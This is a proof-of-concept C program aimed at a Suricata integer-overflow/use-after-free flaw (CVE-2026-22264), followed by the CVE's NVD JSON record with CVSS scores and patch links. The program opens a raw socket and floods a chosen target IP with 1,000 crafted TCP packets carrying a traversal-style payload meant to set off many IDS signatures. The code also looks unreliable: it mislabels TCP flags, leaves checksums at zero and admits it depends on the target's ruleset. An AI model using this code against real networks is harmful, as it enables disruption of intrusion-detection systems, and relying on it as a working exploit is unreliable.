CVE-2026-22264

// CVE-2026-22264 PoC - Suricata Integer Overflow leading to Use-After-Free // This PoC demonstrates triggering the vulnerability by generating excessive alerts #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <arpa/inet.h> #include <sys/socket.h> #define MALICIOUS_PAYLOAD "\x47\x45\x54\x20\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x00" void generate_malicious_packet(unsigned char *packet, int size) { // IP Header packet[0] = 0x45; // Version 4, IHL 5 packet[1] = 0x00; // DSCP packet[2] = (size >> 8) & 0xFF; packet[3] = size & 0xFF; packet[4] = 0x00; packet[5] = 0x01; // Identification packet[6] = 0x40; // Flags: Don't Fragment packet[7] = 0x00; // Fragment Offset packet[8] = 64; // TTL packet[9] = 0x06; // Protocol: TCP packet[10] = 0x00; packet[11] = 0x00; // Checksum placeholder // Source IP: 192.168.1.100 packet[12] = 192; packet[13] = 168; packet[14] = 1; packet[15] = 100; // Dest IP: 192.168.1.1 packet[16] = 192; packet[17] = 168; packet[18] = 1; packet[19] = 1; // TCP Header packet[20] = 0x00; packet[21] = 0x50; // Source Port: 80 packet[22] = 0x01; packet[23] = 0xBB; // Dest Port: 443 packet[24] = 0x00; packet[25] = 0x00; packet[26] = 0x00; packet[27] = 0x01; // Seq packet[28] = 0x00; packet[29] = 0x00; packet[30] = 0x00; packet[31] = 0x00; // Ack packet[32] = 0x50; // Data Offset packet[33] = 0x02; // Flags: SYN, ACK packet[34] = 0x00; packet[35] = 0x00; // Window packet[36] = 0x00; packet[37] = 0x00; // Checksum packet[38] = 0x00; packet[39] = 0x00; // Urgent Pointer // Payload - malicious pattern to match multiple signatures int payload_start = 40; for (int i = 0; i < size - payload_start && i < strlen(MALICIOUS_PAYLOAD); i++) { packet[payload_start + i] = MALICIOUS_PAYLOAD[i]; } } int main(int argc, char *argv[]) { int sock; struct sockaddr_in target; unsigned char packet[65536]; if (argc < 2) { printf("Usage: %s <target_ip>\n", argv[0]); return 1; } printf("[*] CVE-2026-22264 PoC - Suricata Integer Overflow\n"); printf("[*] Target: %s\n", argv[1]); // Create raw socket sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sock < 0) { perror("[!] Socket creation failed"); return 1; } memset(&target, 0, sizeof(target)); target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(argv[1]); // Generate and send malicious packets for (int i = 0; i < 1000; i++) { memset(packet, 0x41, sizeof(packet)); // Fill with pattern generate_malicious_packet(packet, 1500); if (sendto(sock, packet, 1500, 0, (struct sockaddr *)&target, sizeof(target)) < 0) { perror("[!] Send failed"); } usleep(1000); // Small delay between packets } printf("[+] Sent %d malicious packets\n", 1000); printf("[*] If Suricata has >65536 matching signatures, trigger overflow\n"); close(sock); return 0; }

{"cve": {"id": "CVE-2026-22264", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:14.640", "lastModified": "2026-01-29T20:58:58.080", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine. Prior to version 8.0.3 and 7.0.14, an unsigned integer overflow can lead to a heap use-after-free condition when generating excessive amounts of alerts for a single packet. Versions 8.0.3 and 7.0.14 contain a patch. As a workaround, do not run untrusted rulesets or run with less than 65536 signatures that can match on the same packet."}, {"lang": "es", "value": "Suricata es un motor IDS, IPS y NSM de red. Antes de las versiones 8.0.3 y 7.0.14, un desbordamiento de entero sin signo puede conducir a una condición de uso después de liberación en el heap al generar una cantidad excesiva de alertas para un solo paquete. Las versiones 8.0.3 y 7.0.14 contienen un parche. Como solución alternativa, no ejecute conjuntos de reglas no confiables o ejecute con menos de 65536 firmas que puedan coincidir en el mismo paquete."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.14", "matchCriteriaId": "5302B0F0-AF2D-4140-BC66-9186EF7E455D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.3", "matchCriteriaId": "E7DA8362-52A2-4ACC-83F7-CA2E77AE89C6"}]}]}], "references": [{"url": "https://github.com/OISF/suricata/commit/549d7bf60616de8e54686a188196453b5b22f715", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OISF/suricata/commit/5789a3d3760dbf33d93fc56c27bd9529e5bdc8f2", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OISF/suricata/commit/ac1eb394181530430fb7262969f423a1bf8f209b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OISF/suricata/security/advisories/GHSA-mqr8-m3m4-2hw5", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://redmine.openinfosecfoundation.org/issues/8190", "source": "[email protected]", "tags": ["Permissions Required"]}]}}